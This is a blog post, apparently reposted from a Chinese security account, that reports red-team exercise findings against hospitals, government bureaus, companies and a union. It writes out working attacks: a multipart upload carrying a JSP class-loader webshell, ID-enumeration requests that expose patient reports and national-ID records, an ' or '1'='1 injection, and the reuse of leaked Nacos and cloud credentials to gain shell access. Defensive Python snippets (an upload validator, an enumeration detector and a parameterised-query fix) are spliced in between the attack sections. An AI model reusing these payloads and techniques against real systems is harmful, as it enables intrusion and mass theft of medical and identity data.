The month before last I took part in an attack-and-defence exercise in a prefecture-level city. Here is a small subset of the reports, merged into one post (masters who just want the giveaway can scroll straight to the end~~) (the redaction nearly killed me~)
Company X: unauthenticated access + file upload to getshell
http://xxx.xxx.xxx:9081
File upload getshell
POST /api/portal/v1/file/upload?lang=zh_CN HTTP/1.1
Host: xxx.xxx.xxx:9081
Content-Length: 1230
Accept: application/json, text/plain, */*
Tenant-Code: WS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_search_keyword%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_referrer%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMThmY2NiMGQyOTFhY2MtMGQ4Y2QxNGI4MDJjZjMtNGM2NTdiNTgtMTM5NTM5Ni0xOGZjY2IwZDI5MjE4NTQifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%7D
Connection: close
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="file"; filename="11.jsp"
Content-Type: image/png
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="type"
NEWS
------WebKitFormBoundaryytBWAvbx7URctPS3--
https://xxx.xxx.xxx/static_resources/draft/news/xxxx/xxxxx.jsp
Password: passwd
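A server-side upload check that would have rejected the part above (JSP source declared as image/png), written here as an added example in Python rather than the vendor's code; the extension allow-list, size limit and function name are assumptions:

```python
import secrets

# Extension -> (MIME type the client must declare, magic bytes the body must start with)
ALLOWED = {
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    ".gif": ("image/gif", b"GIF8"),
}
# Extensions a Java web container or other server may execute if they land under the web root.
EXECUTABLE = {".jsp", ".jspx", ".jsw", ".jsv", ".php", ".phtml"}
MAX_BYTES = 5 * 1024 * 1024   # assumed limit

def validate_upload(filename, declared_type, data):
    """Return (ok, detail): a rejection reason, or the randomised name to store the file under."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name != filename.lower() or name in ("", ".", ".."):
        return False, "path component in filename"
    parts = name.split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    if any("." + p in EXECUTABLE for p in parts[1:]):   # also catches shell.jsp.png
        return False, "executable extension"
    ext = "." + parts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    mime, magic = ALLOWED[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, "declared type does not match extension"
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not data.startswith(magic):            # JSP source sent as image/png fails here
        return False, "content does not match extension"
    # Never keep the client's name: random name, server-chosen extension, store outside the web root.
    return True, secrets.token_hex(16) + ext

# Constructed inputs: the part from the request above, and a genuine PNG header.
WEBSHELL_PART = ("11.jsp", "image/png", b"<%!\nclass U extends ClassLoader {")
REAL_PNG = ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
```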
Hospital X: million-user data leak
Viewing health check-up reports
POST /app-api/examination/getInspectionList HTTP/1.1
Host: xxx.xxx.xxx:18145
Content-Length: 70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Authorization: Bearer b78b2e2f-b162-4528-ba26-38ff5da78f87
Apptoken: 5891187f4fe91f58bb0fdcf8216254a6d71d43bbe198e86f92a70648f2bc55c9e8cc344fa9b4fa0126c2b78d9891aa71d276a1b8ec0c48b0f20c452f5d129da2f31a907799852ae1cca039a8277d19d4339f19e02116487d737686472fe212bc810e9e61fcde11436e0494459e46bd59cc84fe78097e94f631a694bbb0340a4a0f14f2fefbf4e4b1f8065b28647cec0ff0178d1b4ea44f444bda289f84d1b53cb5a8dc0ed7531dd5c327e4dea7ecaa853eed0acc41652d2205228d6c12a108bb
Content-Type: application/json
Accept: */*
Origin:
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
{"queryType":8,"queryValue":"6363","month":"2024-05","needPage":false}
Iterating queryValue from 0 to 3,000,000 returns a report for every value without gaps. This one is 2225636
This one is 808
Viewing users' order information
POST /app-manage/inHospital/getInpatientPayList HTTP/1.1
Host: xxx.xxx.xxx:18145
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
VERSION: test
Content-Length: 46
{"pageSize": 100,"needPage": true,"pageNo": 1}
Simply change pageSize to 10000.
Hospital X: leak of a million "five-element" identity records
The site was reached through its WeChat mini-program
Iterating uid returns the five elements: ID card number, name, phone number, address and date of birth
POST /xxxx/xxxx/xxxlativeList HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 24
Xweb_xhr: 1
Orgcode: 18477
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309071d) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
hCode=18477&uid=39701982
Iterating uid yields millions of sensitive records: roughly 250 records came back for every 500 uids tried. There should currently be about 4 million uids in total, so around 2 million five-element records.
Some uids leak the five elements of the whole family: parents, the user, the spouse and other sensitive information.
With the information obtained here one can go on to obtain the user's inpatient records, imaging records, payment records, invoice records, registration records and surgery records.
Bureau X: database access + getshell
Nacos leaked the PostgreSQL database connection password
Obtained database access
After connecting, went straight to command execution
RabbitMQ
Bureau X: takeover of all user accounts + SQL injection yielding 26 Oracle databases, 40 database users and DBA privileges
The site was again found via its mini-program
Obtained every company administrator's username and plaintext password, along with the administrators' phone numbers, ID card numbers and other information. Click any enterprise
and a request is sent automatically
The leaked information is as follows
It leaks that company's administrator account and password; attempting to log in with them succeeds. Login URL: https://xxx.xxx.xxx/
The information finally leaked: accounts and passwords for 1161 companies. After logging into a company account one can obtain the related persons' ID card numbers, phone numbers and e-mail addresses
With the account and password one can log in
Click to enter the system
This gives access to a large number of video surveillance feeds, viewable live, plus the tokens for surveillance in many regions
All accounts use a weak password: the phone number is taken from the back end and the password is a123456
SQL injection
Request
POST /cxmStatic/dashboard/1/list HTTP/1.1
Host: xxx.xxx.xxx
Cookie:
Content-Length: 14
Accept-Encoding: gzip, deflate, br
Apptype: WEIXIN_MINI
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxNDUwNjc6V0VJWElOX01JTkkiLCJleHAiOjE3MTU5NjQwNTEsImlhdCI6MTcxNTk0OTY1MX0.qUHwdpcRccIg4Nct5i58qPxZ6OiV9PfBhHilWhyIG_0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Charset: UTF-8
Xweb_xhr: 1
X-Requested-With: XMLHttpRequest
Appid: wx67d2416db3cb5b69
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
Connection: close
zoneId=511827*
Databases: 26 in total
Database usernames: 40 database users in total
One of the databases has 256 tables
The database contains three-element identity information
Hospital X: horizontal privilege escalation exposing 200k+ patients' check-up reports
The requests are below; any token you generate yourself will do. To generate a token, send the following request:
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineeIcno":"123"}
POST /sj-bifrost-web/report/detail HTTP/2
Host: xxx.xxx.xxx
Content-Length: 101
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
{"token":"F83BA1402B2A8AABB3D042115500D571D3A1685910B84F00B907689BA4ED0547","serviceNumber":"199245"}
Iterating serviceNumber lets you view other people's reports: the ID card number is still tied to the token, but the report itself depends only on serviceNumber. serviceNumber was iterated from 0 to 300k
Here the id was iterated from 0 to 200k and every value returned data
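Detection logic for the enumeration patterns in this post (queryValue in the check-up report API, pageSize in the order API, uid in the five-element API, serviceNumber in the report detail API), as an added example that is not from the original post; the log format, thresholds and client addresses are constructed:

```python
from collections import defaultdict
from datetime import datetime

WINDOW_SEC = 60        # look-back window for counting distinct ids per client
MIN_IDS = 20           # distinct ids inside the window before we call it enumeration
MIN_SEQ_RATIO = 0.8    # share of adjacent sorted ids that differ by exactly 1
MAX_PAGE_SIZE = 100    # largest pageSize the real front end ever asks for (assumed)
ID_PARAMS = ("queryValue", "uid", "serviceNumber")

def parse(line):
    """Constructed format: '<iso time> <client> <endpoint> <param>=<value>'."""
    ts, client, endpoint, kv = line.split(" ", 3)
    key, value = kv.split("=", 1)
    return datetime.fromisoformat(ts), client, endpoint, key, value

def detect(lines):
    alerts, seen = [], defaultdict(list)
    for line in lines:
        ts, client, endpoint, key, value = parse(line)
        if not value.isdigit():
            continue
        if key == "pageSize" and int(value) > MAX_PAGE_SIZE:
            alerts.append(("oversized_page", client, endpoint, int(value)))
        elif key in ID_PARAMS:
            seen[(client, endpoint, key)].append((ts, int(value)))
    for (client, endpoint, key), events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):          # sliding window over time-ordered requests
            while (events[end][0] - events[start][0]).total_seconds() > WINDOW_SEC:
                start += 1
            ids = sorted({n for _, n in events[start:end + 1]})
            if len(ids) < MIN_IDS:
                continue
            seq = sum(1 for a, b in zip(ids, ids[1:]) if b - a == 1)
            if seq / (len(ids) - 1) >= MIN_SEQ_RATIO:
                alerts.append(("id_enumeration", client, endpoint, key, ids[0], ids[-1]))
                break                            # one alert per client/endpoint/param
    return alerts

# Constructed sample: one ordinary user, one oversized page request, one enumerating client.
SAMPLE = [
    "2024-05-20T10:00:00 10.0.0.5 /app-api/examination/getInspectionList queryValue=6363",
    "2024-05-20T10:00:07 10.0.0.5 /app-api/examination/getInspectionList queryValue=6363",
    "2024-05-20T10:01:00 10.0.0.9 /app-manage/inHospital/getInpatientPayList pageSize=10000",
] + [
    f"2024-05-20T10:02:{s:02d} 10.0.0.7 /sj-bifrost-web/report/detail serviceNumber={199000 + s}"
    for s in range(30)
]
```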
College-affiliated hospital X: unauthenticated SQL injection exposing 58,387 citizens' records
Obtain a token with this request
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineePhone":"' or '1'='1"}
Use the token to obtain three-element identity information
GET /sj-bifrost-web/report/reportOrderList?token=8ED9D6B38CDBF617724060160F957101311CFF26B28F48D18CFFDCA22C3D7A62 HTTP/2
Host: xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
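The injection payload from the generateToken request and the token/serviceNumber authorisation problem from the two hospital sections above, shown against a constructed SQLite stand-in; this is an added example, not the vendor's code, and the table layout, token store and function names are assumptions:

```python
import secrets
import sqlite3

PAYLOAD = "' or '1'='1"   # the examineePhone value from the request above

def make_db():
    """Constructed stand-in for the examinee and report tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE examinee (icno TEXT PRIMARY KEY, phone TEXT)")
    db.execute("CREATE TABLE report (service_number TEXT PRIMARY KEY, icno TEXT)")
    db.executemany("INSERT INTO examinee VALUES (?, ?)",
                   [("123", "13800000001"), ("456", "13800000002")])
    db.executemany("INSERT INTO report VALUES (?, ?)",
                   [("199245", "123"), ("199246", "456")])
    return db

def find_vulnerable(db, phone):
    """String-built WHERE clause: the quote inside the JSON value rewrites the query."""
    return [r[0] for r in db.execute(
        f"SELECT icno FROM examinee WHERE phone = '{phone}'")]

def find_fixed(db, phone):
    """Bound parameter: the value is data, never SQL."""
    return [r[0] for r in db.execute(
        "SELECT icno FROM examinee WHERE phone = ?", (phone,))]

TOKENS = {}   # server-side token -> icno; a forged or copied token maps to nothing

def generate_token(db, phone):
    """Issue a token only when the lookup matches exactly one examinee."""
    matches = find_fixed(db, phone)
    if len(matches) != 1:
        return None
    tok = secrets.token_hex(32)
    TOKENS[tok] = matches[0]
    return tok

def report_detail(db, token, service_number):
    """Authorise on the token's owner, not on the guessable serviceNumber alone."""
    icno = TOKENS.get(token)
    if icno is None:
        return None
    row = db.execute("SELECT icno FROM report WHERE service_number = ? AND icno = ?",
                     (service_number, icno)).fetchone()
    return None if row is None else service_number
```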
Labour union X: cloud account takeover and getshell
An access key (AK) leaked in Nacos led to cloud account takeover
aliyun:
textAudit:
accessKeyId: xxxxxxxxx
secret: xxxxxxxxxxxxx
endpoint: xxxxxxxxxxxxxx
Obtained the Alibaba Cloud account credentials
Logged in successfully and obtained control of an Alibaba Cloud server
Terminal control from the Alibaba Cloud console gives RCE / getshell directly
The account also owns a large number of resources, as pictured: control of multiple domains, servers, multiple storage buckets, gateways, the SMS service, video live-streaming and DNS servers; 51 resources in total
Labour union X: Nacos authentication bypass + database access
http://xxx.xxx.xxx:28848/nacos/
### redis service
redisInfo:
host:xxxxxxxxxx
port:xxxxxxxx
password: xxxxxxxxxxx
database:0
### mysql service
custom:
mysql:
master:
connect:xxxxxxxx
username: xxxxxx
password:xxxxxxxx
slave:
connect:xxxxxxxxx/xxxxxx
username: xxxxxxxxxx
password:xxxxxxx
dxb:
httpUrl: xxxxxxxxxx
dxbUsername: xxxx
dxbPassword: xxxxx
rabbitmq:
host: xxxxxxx
port: xxxxxx
username: xxxxxxx
password: xxxxxxxxxxxx
Leaked WeChat API key and secret
Obtain the access token: https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=xxxxx&secret=xxxxxxxxxxxxxxx
https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ak With this access token the official account can be managed
Originally published on the WeChat official account 渗透安全团队: Scoring tens of thousands of points in a municipal 护网 (HVV) exercise, all in one read (giveaway at the end)